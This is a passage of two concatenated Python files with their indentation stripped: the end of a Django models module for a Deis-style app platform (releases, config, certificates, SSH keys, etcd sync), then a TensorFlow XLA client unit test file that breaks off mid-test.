previous_config = self.app.config_set.latest()
for attr in ['cpu', 'memory', 'tags', 'values']:
# Guard against migrations from older apps without fixes to
# JSONField encoding.
try:
data = getattr(previous_config, attr).copy()
except AttributeError:
data = {}
try:
new_data = getattr(self, attr).copy()
except AttributeError:
new_data = {}
data.update(new_data)
# remove config keys if we provided a null value
[data.pop(k) for k, v in new_data.viewitems() if v is None]
setattr(self, attr, data)
except Config.DoesNotExist:
pass
return super(Config, self).save(**kwargs)
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
# construct fully-qualified target image
new_version = self.version + 1
# create new release and auto-increment version
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
log_event(self.app, e)
pass
return release
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_image = self.build.image
if ':' not in source_image:
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = "{}:{}".format(source_image, source_tag)
# If the build has a SHA, assume it's from deis-builder and in the deis-registry already
deis_registry = bool(self.build.sha)
publish_release(source_image, self.config.values, self.image, deis_registry)
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
raise EnvironmentError('version cannot be below 0')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Certificate(AuditedModel):
"""
Public and private key pair used to secure application traffic at the router.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
# there is no upper limit on the size of an x.509 certificate
certificate = models.TextField(validators=[validate_certificate])
key = models.TextField()
# X.509 certificates allow any string of information as the common name.
common_name = models.TextField(unique=True, validators=[validate_common_name])
expires = models.DateTimeField()
def __str__(self):
return self.common_name
def _get_certificate(self):
try:
return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)
except crypto.Error as e:
raise SuspiciousOperation(e)
def save(self, *args, **kwargs):
certificate = self._get_certificate()
if not self.common_name:
self.common_name = certificate.get_subject().CN
if not self.expires:
# convert openssl's expiry date format to Django's DateTimeField format
self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ')
return super(Certificate, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True, validators=[validate_base64])
fingerprint = models.CharField(max_length=128)
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'fingerprint'))
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
def save(self, *args, **kwargs):
self.fingerprint = fingerprint(self.public)
return super(Key, self).save(*args, **kwargs)
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: build {} created".format(build.app, build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: release {} created".format(release.app, release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: config {} updated".format(config.app, config))
def _log_domain_added(**kwargs):
if kwargs.get('created'):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
def _log_cert_added(**kwargs):
if kwargs.get('created'):
cert = kwargs['instance']
logger.info("cert {} added".format(cert))
def _log_cert_removed(**kwargs):
cert = kwargs['instance']
logger.info("cert {} removed".format(cert))
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
try:
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
except KeyError:
pass
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_publish_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
except KeyError:
# Ignore error when the directory already exists.
pass
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_cert(**kwargs):
cert = kwargs['instance']
_etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate)
_etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key)
def _etcd_purge_cert(**kwargs):
cert = kwargs['instance']
try:
_etcd_client.delete('/deis/certs/{}'.format(cert),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_config(**kwargs):
config = kwargs['instance']
# we purge all existing config when adding the newest instance. This is because
# deis config:unset would remove an existing value, but not delete the
# old config object
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
for k, v in config.values.iteritems():
_etcd_client.write(
'/deis/config/{}/{}'.format(
config.app,
unicode(k).encode('utf-8').lower()),
unicode(v).encode('utf-8'))
def _etcd_purge_config(**kwargs):
config = kwargs['instance']
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_domains(**kwargs):
domain = kwargs['instance']
_etcd_client.write('/deis/domains/{}'.format(domain), domain.app)
def _etcd_purge_domains(**kwargs):
domain = kwargs['instance']
try:
_etcd_client.delete('/deis/domains/{}'.format(domain),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
_etcd_client = get_etcd_client()
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_publish_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
post_save.connect(_etcd_publish_cert, sender=Certificate, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models')
post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertTrue(len(proto.computations) == 1)
self.assertTrue(len(proto.computations[0].instructions) == 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
